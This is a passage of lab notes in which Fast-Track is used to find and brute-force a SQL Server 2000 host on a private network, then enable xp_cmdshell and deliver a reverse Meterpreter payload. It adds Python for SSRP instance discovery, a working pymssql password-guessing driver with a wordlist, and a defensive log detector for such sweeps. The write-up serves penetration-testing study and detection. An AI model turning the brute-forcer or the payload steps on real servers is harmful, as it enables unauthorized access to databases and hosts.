(a)ttempt SQL Ping and Auto Quick Brute Force (to be continued)

On BT5R3 the Metasploit path in /pentest/exploits/fasttrack/config/fasttrack_config has to be changed to:

METASPLOIT_PATH=/opt/metasploit/app/

Otherwise Fast-Track cannot find msfcli. Confirm the binary is really there before starting (ls -l /opt/metasploit/app/msfcli), because the failure only shows up later, when a Metasploit payload is selected.

Then start Fast-Track in interactive mode and work through the menus:

root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i

***********************************************
******* Performing dependency checks... *******
***********************************************

*** FreeTDS and PYMMSQL are installed. (Check) ***
*** PExpect is installed. (Check) ***
*** ClientForm is installed. (Check) ***
*** Psyco is installed. (Check) ***
*** Beautiful Soup is installed. (Check) ***

Also ensure ProFTP, WinEXE, and SQLite3 is installed from
the Updates/Installation menu.

Your system has all requirements needed to run Fast-Track!

 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Fast-Track Main Menu:

    1.  Fast-Track Updates
    2.  Autopwn Automation
    3.  Nmap Scripting Engine
    4.  Microsoft SQL Tools
    5.  Mass Client-Side Attack
    6.  Exploits
    7.  Binary to Hex Payload Converter
    8.  Payload Generator
    9.  Fast-Track Tutorials
    10. Fast-Track Changelog
    11. Fast-Track Credits
    12. Exit Fast-Track

    Enter the number: 4

 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Microsoft SQL Attack Tools

    1. MSSQL Injector
    2. MSSQL Bruter
    3. SQLPwnage

    (q)uit

    Enter your choice : 2
 *****************************************************************
 **                                                             **
 **  Fast-Track - A new beginning...                            **
 **  Version: 4.0.2                                             **
 **  Written by: David Kennedy (ReL1K)                          **
 **  Lead Developer: Joey Furr (j0fer)                          **
 **  http://www.secmaniac.com                                   **
 **                                                             **
 *****************************************************************

Enter the IP Address and Port Number to Attack.

    Options: (a)ttempt SQL Ping and Auto Quick Brute Force
             (m)ass scan and dictionary brute
             (s)ingle Target (Attack a Single Target with big dictionary)
             (f)ind SQL Ports (SQL Ping)
             (i) want a command prompt and know which system is vulnerable
             (v)ulnerable system, I want to add a local admin on the box...
             (r)aw SQL commands to the SQL Server
             (e)nable xp_cmdshell if its disabled (sql2k and sql2k5)
             (h)ost list file of IP addresses you want to attack
           
             (q)uit
            
    Enter Option: a
Enter username for SQL database (example:sa): sa
Enter the IP Range to scan for SQL Scan (example 192.168.1.1-255): 192.168.1.1/24

Do you want to perform advanced SQL server identification on non-standard SQL ports? This will use UDP footprinting in order to determine where the SQL servers are at. This could take quite a long time.

Do you want to perform advanced identification, yes or no: yes
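The "advanced identification" step is what SQL Ping has always been: one SSRP (SQL Server Resolution Protocol) datagram to UDP 1434, which the engine (SQL Server 2000) or the SQL Browser service (2005 and later) answers with a list of every instance on the host, including the TCP port each one listens on. That answer is how non-standard ports get found without a full TCP scan. The following is an added example written for this page, not Fast-Track's own code: it sends the probe, parses the reply, and is exercised offline against a constructed reply (the host name SQL2K, the instance DEV and the port 50123 are made up).

```python
import socket
import struct

SSRP_PORT = 1434         # SQL Server Resolution Protocol, UDP
CLNT_UCAST_EX = b"\x03"  # "list every instance on this host" request
SVR_RESP = 0x05          # first byte of every SSRP reply

# Major version from the reply's Version field to the product it belongs to.
PRODUCT_BY_MAJOR = {8: "SQL Server 2000", 9: "SQL Server 2005", 10: "SQL Server 2008"}


def parse_ssrp_response(datagram):
    """Turn one SVR_RESP datagram into a list of {key: value} dicts, one per instance.

    Layout: 0x05, 16-bit little-endian body length, then a ';'-separated run of
    key/value pairs; every instance record is terminated by ';;'.
    """
    if len(datagram) < 3 or datagram[0] != SVR_RESP:
        raise ValueError("not an SSRP server response")
    (size,) = struct.unpack_from("<H", datagram, 1)
    body = datagram[3:3 + size].decode("ascii", errors="replace")
    instances = []
    for record in body.split(";;"):
        if not record:
            continue
        fields = record.split(";")
        inst = dict(zip(fields[0::2], fields[1::2]))
        major = int(inst.get("Version", "0").split(".")[0])
        inst["Product"] = PRODUCT_BY_MAJOR.get(major, "unknown")
        instances.append(inst)
    return instances


def tcp_ports(instances):
    """TCP listener ports advertised in the reply; named instances usually sit on dynamic ports."""
    return [int(i["tcp"]) for i in instances if "tcp" in i]


def sql_ping(host, timeout=2.0):
    """Send CLNT_UCAST_EX to host:1434/udp and return the parsed instances ([] if nothing answers).

    Silence does not prove there is no SQL Server: 1434/udp is commonly firewalled and on
    2005+ the Browser service may be stopped. Fall back to a TCP scan of 1433 and the
    high ports in that case.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(CLNT_UCAST_EX, (host, SSRP_PORT))
        try:
            datagram, _ = sock.recvfrom(65535)
        except socket.timeout:
            return []
    return parse_ssrp_response(datagram)


def build_response(body):
    """Encode a reply the way a server would; used here only to construct the sample below."""
    raw = body.encode("ascii")
    return bytes([SVR_RESP]) + struct.pack("<H", len(raw)) + raw


# Constructed sample reply (not captured from a real host): a default SQL Server 2000 RTM
# instance on 1433 plus a named 2005 instance on a dynamic port.
SAMPLE_RESPONSE = build_response(
    "ServerName;SQL2K;InstanceName;MSSQLSERVER;IsClustered;No;Version;8.00.194;tcp;1433;;"
    "ServerName;SQL2K;InstanceName;DEV;IsClustered;No;Version;9.00.1399.06;tcp;50123;"
    "np;\\\\SQL2K\\pipe\\MSSQL$DEV\\sql\\query;;"
)

if __name__ == "__main__":
    for inst in parse_ssrp_response(SAMPLE_RESPONSE):
        print(inst["ServerName"], inst["InstanceName"], inst["Product"], inst.get("tcp"))
```

Against a live host, replace SAMPLE_RESPONSE with sql_ping("192.168.1.142"); the Version field alone already tells you whether you are looking at a 2000 box (8.x) or a 2005 box (9.x), which matters for the xp_cmdshell step later.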

With that answered, the SQL Ping starts and the brute force follows automatically:

[-] Launching SQL Ping, this may take a while to footprint.... [-]

[*] Please wait while we load the module tree...
Brute forcing username: sa

Be patient this could take awhile...

Brute forcing password of password2 on IP 192.168.1.142:1433
Brute forcing password of  on IP 192.168.1.142:1433
Brute forcing password of password on IP 192.168.1.142:1433
Brute forcing password of sqlserver on IP 192.168.1.142:1433
Brute forcing password of sql on IP 192.168.1.142:1433
Brute forcing password of password1 on IP 192.168.1.142:1433
Brute forcing password of password123 on IP 192.168.1.142:1433
Brute forcing password of complexpassword on IP 192.168.1.142:1433
Brute forcing password of database on IP 192.168.1.142:1433
Brute forcing password of server on IP 192.168.1.142:1433
Brute forcing password of changeme on IP 192.168.1.142:1433
Brute forcing password of change on IP 192.168.1.142:1433
Brute forcing password of sqlserver2000 on IP 192.168.1.142:1433
Brute forcing password of sqlserver2005 on IP 192.168.1.142:1433
Brute forcing password of Sqlserver on IP 192.168.1.142:1433
Brute forcing password of SqlServer on IP 192.168.1.142:1433
Brute forcing password of Password1 on IP 192.168.1.142:1433
Brute forcing password of Password2 on IP 192.168.1.142:1433
Brute forcing password of P@ssw0rd on IP 192.168.1.142:1433
Brute forcing password of P@ssw0rd! on IP 192.168.1.142:1433
Brute forcing password of P@55w0rd! on IP 192.168.1.142:1433
Brute forcing password of P@ssword! on IP 192.168.1.142:1433
Brute forcing password of Password! on IP 192.168.1.142:1433
Brute forcing password of password! on IP 192.168.1.142:1433
Brute forcing password of sqlsvr on IP 192.168.1.142:1433
Brute forcing password of sqlaccount on IP 192.168.1.142:1433
Brute forcing password of account on IP 192.168.1.142:1433
Brute forcing password of sasa on IP 192.168.1.142:1433
Brute forcing password of sa on IP 192.168.1.142:1433
Brute forcing password of administator on IP 192.168.1.142:1433
Brute forcing password of pass on IP 192.168.1.142:1433
Brute forcing password of sql on IP 192.168.1.142:1433
Brute forcing password of sqlsql on IP 192.168.1.142:1433
Brute forcing password of microsoft on IP 192.168.1.142:1433
Brute forcing password of sqlserver on IP 192.168.1.142:1433
Brute forcing password of sa on IP 192.168.1.142:1433
Brute forcing password of sasa on IP 192.168.1.142:1433
Brute forcing password of welcome on IP 192.168.1.142:1433
Brute forcing password of sqlpass on IP 192.168.1.142:1433
Brute forcing password of sqlpassword on IP 192.168.1.142:1433
Brute forcing password of guessme on IP 192.168.1.142:1433
Brute forcing password of bird on IP 192.168.1.142:1433
Brute forcing password of P@55w0rd! on IP 192.168.1.142:1433
Brute forcing password of test on IP 192.168.1.142:1433
Brute forcing password of dev on IP 192.168.1.142:1433
Brute forcing password of qa on IP 192.168.1.142:1433
Brute forcing password of god on IP 192.168.1.142:1433
Brute forcing password of sysadmin on IP 192.168.1.142:1433
Brute forcing password of water on IP 192.168.1.142:1433
Brute forcing password of dirt on IP 192.168.1.142:1433
Brute forcing password of air on IP 192.168.1.142:1433
Brute forcing password of earth on IP 192.168.1.142:1433
Brute forcing password of company on IP 192.168.1.142:1433
Brute forcing password of secret on IP 192.168.1.142:1433
Brute forcing password of sqlpass123 on IP 192.168.1.142:1433
Brute forcing password of 123456 on IP 192.168.1.142:1433
Brute forcing password of abcd123 on IP 192.168.1.142:1433
Brute forcing password of abc on IP 192.168.1.142:1433
Brute forcing password of burp on IP 192.168.1.142:1433
Brute forcing password of private on IP 192.168.1.142:1433
Brute forcing password of unknown on IP 192.168.1.142:1433
Brute forcing password of wicked on IP 192.168.1.142:1433
Brute forcing password of alpine on IP 192.168.1.142:1433
Brute forcing password of trust on IP 192.168.1.142:1433
Brute forcing password of microsoft on IP 192.168.1.142:1433
Brute forcing password of sql2000 on IP 192.168.1.142:1433
Brute forcing password of sql2003 on IP 192.168.1.142:1433
Brute forcing password of sql2005 on IP 192.168.1.142:1433
Brute forcing password of sql2008 on IP 192.168.1.142:1433
Brute forcing password of vista on IP 192.168.1.142:1433
Brute forcing password of xp on IP 192.168.1.142:1433
Brute forcing password of nt on IP 192.168.1.142:1433
Brute forcing password of 98 on IP 192.168.1.142:1433
Brute forcing password of 95 on IP 192.168.1.142:1433
Brute forcing password of 2003 on IP 192.168.1.142:1433
Brute forcing password of 2008 on IP 192.168.1.142:1433

Sorry the brute force attack was unsuccessful. Better luck next time!

Fast-Track successfully found the IP of the MSSQL 2000 box, 192.168.1.142, but did not guess the password. Next I change the password so that it can succeed.
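Two things stand out in the run above: the built-in list contains duplicates (sa, sasa, sql, sqlserver, microsoft and P@55w0rd! are each tried twice, and "administator" is a typo the tool ships with), and every guess is a separate SQL-authentication login that the server records (error 18456 in the ERRORLOG and the Application log on 2005 and later). On 2005 and later a SQL login created with CHECK_POLICY on can also inherit the host's account-lockout policy, so a long list can lock the account instead of cracking it. The driver below is an added example for this page, not Fast-Track's code: it tries each candidate once, leaves a target alone as soon as it falls, and caps the guesses per target. The real login uses pymssql over FreeTDS (the dependency Fast-Track checks for at startup); the WORDLIST is a subset of the list shown above in the tool's own order, and fake_login is an offline stand-in so the driver can be exercised without a server (192.168.1.142 with sa/password123 mirrors the page, 192.168.1.7 is made up).

```python
from collections import OrderedDict


def dedupe(words):
    """Keep the first occurrence of every candidate, preserving list order."""
    return list(OrderedDict.fromkeys(words))


def mssql_login(host, port, user, password, timeout=3):
    """Try one SQL-authentication login through pymssql/FreeTDS; True on success."""
    import pymssql  # imported lazily so the driver can be exercised without it installed
    try:
        conn = pymssql.connect(server=host, port=str(port), user=user,
                               password=password, login_timeout=timeout)
    except (pymssql.OperationalError, pymssql.InterfaceError):
        # 18456 "Login failed" surfaces as OperationalError; unreachable hosts as InterfaceError
        return False
    conn.close()
    return True


def brute_force(targets, user, wordlist, try_login=mssql_login, max_attempts=None):
    """Guess `user`'s password on every (host, port) in `targets`.

    Returns {(host, port): password} for the targets that fell. Duplicates are tried
    once, each target is left alone once cracked, and max_attempts caps the guesses
    per target so a list can be kept under a known lockout threshold.
    """
    candidates = dedupe(wordlist)
    if max_attempts is not None:
        candidates = candidates[:max_attempts]
    found = {}
    for host, port in targets:
        for password in candidates:
            if try_login(host, port, user, password):
                found[(host, port)] = password
                break
    return found


# Constructed wordlist: a subset of the list Fast-Track tried above, in the tool's order,
# duplicates included ("sql", "sqlserver", "sa" and "sasa" each occur twice). The empty
# string is a legitimate candidate: a blank sa password was the SQL Server 2000 default.
WORDLIST = ["password2", "", "password", "sqlserver", "sql", "password1", "password123",
            "complexpassword", "database", "server", "changeme", "change", "sqlserver2000",
            "sqlserver2005", "sqlsvr", "sqlaccount", "account", "sasa", "sa", "administator",
            "pass", "sql", "sqlsql", "microsoft", "sqlserver", "sa", "sasa"]


def fake_login(truth, attempts):
    """Offline stand-in for mssql_login. `truth` maps (host, port, user) to the real
    password; `attempts` collects every (host, guess) so the driver's behaviour is visible."""
    def login(host, port, user, password):
        attempts.append((host, password))
        return truth.get((host, port, user)) == password
    return login


if __name__ == "__main__":
    attempts = []
    login = fake_login({("192.168.1.142", 1433, "sa"): "password123"}, attempts)
    print(brute_force([("192.168.1.142", 1433)], "sa", WORDLIST, try_login=login))
    print(len(attempts), "guesses")
```

With the sample data the first target falls on the seventh guess, exactly where the second run below finds password123, and the driver does not keep hammering the box with the remaining candidates afterwards.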



Then I run the SQL Ping again:

Brute forcing username: sa

Be patient this could take awhile...

Brute forcing password of password2 on IP 192.168.1.142:1433
Brute forcing password of  on IP 192.168.1.142:1433
Brute forcing password of password on IP 192.168.1.142:1433
Brute forcing password of sqlserver on IP 192.168.1.142:1433
Brute forcing password of sql on IP 192.168.1.142:1433
Brute forcing password of password1 on IP 192.168.1.142:1433
Brute forcing password of password123 on IP 192.168.1.142:1433

SQL Server Compromised: "sa" with password of: "password123" on IP 192.168.1.142:1433

Brute forcing password of complexpassword on IP 192.168.1.142:1433
Brute forcing password of database on IP 192.168.1.142:1433
Brute forcing password of server on IP 192.168.1.142:1433
Brute forcing password of changeme on IP 192.168.1.142:1433
Brute forcing password of change on IP 192.168.1.142:1433
Brute forcing password of sqlserver2000 on IP 192.168.1.142:1433
Brute forcing password of sqlserver2005 on IP 192.168.1.142:1433
Brute forcing password of Sqlserver on IP 192.168.1.142:1433
Brute forcing password of SqlServer on IP 192.168.1.142:1433
Brute forcing password of Password1 on IP 192.168.1.142:1433
Brute forcing password of Password2 on IP 192.168.1.142:1433
Brute forcing password of P@ssw0rd on IP 192.168.1.142:1433
Brute forcing password of P@ssw0rd! on IP 192.168.1.142:1433
Brute forcing password of P@55w0rd! on IP 192.168.1.142:1433
Brute forcing password of P@ssword! on IP 192.168.1.142:1433
Brute forcing password of Password! on IP 192.168.1.142:1433
Brute forcing password of password! on IP 192.168.1.142:1433
Brute forcing password of sqlsvr on IP 192.168.1.142:1433
Brute forcing password of sqlaccount on IP 192.168.1.142:1433
Brute forcing password of account on IP 192.168.1.142:1433
Brute forcing password of sasa on IP 192.168.1.142:1433
Brute forcing password of sa on IP 192.168.1.142:1433
Brute forcing password of administator on IP 192.168.1.142:1433
Brute forcing password of pass on IP 192.168.1.142:1433
Brute forcing password of sql on IP 192.168.1.142:1433
Brute forcing password of sqlsql on IP 192.168.1.142:1433
Brute forcing password of microsoft on IP 192.168.1.142:1433
Brute forcing password of sqlserver on IP 192.168.1.142:1433
Brute forcing password of sa on IP 192.168.1.142:1433
Brute forcing password of sasa on IP 192.168.1.142:1433
Brute forcing password of welcome on IP 192.168.1.142:1433
Brute forcing password of sqlpass on IP 192.168.1.142:1433
Brute forcing password of sqlpassword on IP 192.168.1.142:1433
Brute forcing password of guessme on IP 192.168.1.142:1433
Brute forcing password of bird on IP 192.168.1.142:1433
Brute forcing password of P@55w0rd! on IP 192.168.1.142:1433
Brute forcing password of test on IP 192.168.1.142:1433
Brute forcing password of dev on IP 192.168.1.142:1433
Brute forcing password of qa on IP 192.168.1.142:1433
Brute forcing password of god on IP 192.168.1.142:1433
Brute forcing password of sysadmin on IP 192.168.1.142:1433
Brute forcing password of water on IP 192.168.1.142:1433
Brute forcing password of dirt on IP 192.168.1.142:1433
Brute forcing password of air on IP 192.168.1.142:1433
Brute forcing password of earth on IP 192.168.1.142:1433
Brute forcing password of company on IP 192.168.1.142:1433
Brute forcing password of secret on IP 192.168.1.142:1433
Brute forcing password of sqlpass123 on IP 192.168.1.142:1433
Brute forcing password of 123456 on IP 192.168.1.142:1433
Brute forcing password of abcd123 on IP 192.168.1.142:1433
Brute forcing password of abc on IP 192.168.1.142:1433
Brute forcing password of burp on IP 192.168.1.142:1433
Brute forcing password of private on IP 192.168.1.142:1433
Brute forcing password of unknown on IP 192.168.1.142:1433
Brute forcing password of wicked on IP 192.168.1.142:1433
Brute forcing password of alpine on IP 192.168.1.142:1433
Brute forcing password of trust on IP 192.168.1.142:1433
Brute forcing password of microsoft on IP 192.168.1.142:1433
Brute forcing password of sql2000 on IP 192.168.1.142:1433
Brute forcing password of sql2003 on IP 192.168.1.142:1433
Brute forcing password of sql2005 on IP 192.168.1.142:1433
Brute forcing password of sql2008 on IP 192.168.1.142:1433
Brute forcing password of vista on IP 192.168.1.142:1433
Brute forcing password of xp on IP 192.168.1.142:1433
Brute forcing password of nt on IP 192.168.1.142:1433
Brute forcing password of 98 on IP 192.168.1.142:1433
Brute forcing password of 95 on IP 192.168.1.142:1433
Brute forcing password of 2003 on IP 192.168.1.142:1433
Brute forcing password of 2008 on IP 192.168.1.142:1433

*******************************************
The following SQL Servers were compromised:
*******************************************

1. 192.168.1.142:1433 *** U/N: sa P/W: password123 ***

*******************************************

To interact with system, enter the SQL Server number. 

Example: 1. 192.168.1.32 you would type 1

Enter the number: 1
Specify payload:

1. Standard Command Prompt
2. Metasploit Reverse VNC TCP (Requires Metasploit) 
3. Metasploit Meterpreter (Requires Metasploit)
4. Metasploit Reflective VNC DLL Injection (Requires Metasploit)
     
Enter number here: 3

Enabling: XP_Cmdshell...
Finished trying to re-enable xp_cmdshell stored procedure if disabled.

What port do you want the payload to connect to you on: 4444
Metasploit Reverse Meterpreter Upload Detected..
Launching Meterpreter Handler.
Creating Metasploit Reverse Meterpreter Payload..

So the password, password123, was found. But the next step did not succeed:

Sending payload: 6200
Metasploit payload delivered..
Converting our payload to binary, this may take a few...
Cleaning up...
Launching payload, this could take up to a minute...
When finished, close the metasploit handler window to return to other compromised SQL Servers.
Press enter to return back to compromised SQL Servers.
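Whatever the payload stage did on the target, the brute-force phase has already left an unmistakable trace on the server: dozens of rejected sa logins from one client address within a few seconds. On SQL Server 2005 and later each one lands in the ERRORLOG as a pair of "Logon" lines ("Error: 18456, Severity: 14, State: 8." followed by "Login failed for user 'sa'. [CLIENT: ip]"), and SQL Server 2000 logs the same sentence without the [CLIENT: ...] suffix. The following is an added example for this page, not part of the original post: a sliding-window detector for that pattern, run over a constructed ERRORLOG excerpt (the timestamps, the client addresses 192.168.1.1 and 10.0.0.5 and the login appuser are made up). Where a Fast-Track run is reflected in the log, it trips the default threshold within the first second.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Second of the two lines SQL Server 2005+ writes to ERRORLOG for a rejected login.
# The line before it carries "Error: 18456, Severity: 14, State: 8." (state 8 = wrong password).
LOGIN_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\.\d+\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']+)'\..*\[CLIENT: (?P<ip>[\d.]+)\]"
)


def parse_failures(lines):
    """Return (timestamp, login name, client IP) for every failed-login line."""
    failures = []
    for line in lines:
        m = LOGIN_FAILED.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
            failures.append((ts, m.group("user"), m.group("ip")))
    return failures


def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Sliding-window count of failures per (client IP, login).

    Returns {(ip, user): time_of_first_alert} for every pair that reached `threshold`
    failures inside `window`. Per-source counting keeps one user mistyping a password
    from masquerading as, or masking, a sweep like the one above.
    """
    recent = defaultdict(deque)
    alerts = {}
    for ts, user, ip in parse_failures(lines):
        key = (ip, user)
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and key not in alerts:
            alerts[key] = ts
    return alerts


def sample_errorlog():
    """Constructed ERRORLOG excerpt (not copied from a real server): a twelve-guess sweep
    against sa from 192.168.1.1 in under five seconds, plus two unrelated typos by appuser."""
    base = datetime(2012, 10, 18, 20, 15, 2)
    lines = []

    def add(ts, user, ip):
        stamp = ts.strftime("%Y-%m-%d %H:%M:%S.%f")[:-4]
        lines.append(f"{stamp} Logon       Error: 18456, Severity: 14, State: 8.")
        lines.append(f"{stamp} Logon       Login failed for user '{user}'. [CLIENT: {ip}]")

    for i in range(12):
        add(base + timedelta(milliseconds=400 * i), "sa", "192.168.1.1")
    for i in range(2):
        add(base + timedelta(minutes=5 * i), "appuser", "10.0.0.5")
    return lines


if __name__ == "__main__":
    for (ip, user), when in detect_bruteforce(sample_errorlog()).items():
        print(f"{when} brute force against '{user}' from {ip}")
```

The same logic applies unchanged to lines read from the real ERRORLOG; the threshold of ten failures in a minute is a starting point, and on a server where sa is disabled (the recommended state) any failure for sa at all is worth an alert.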

I still need to read the code and debug this; more tomorrow.
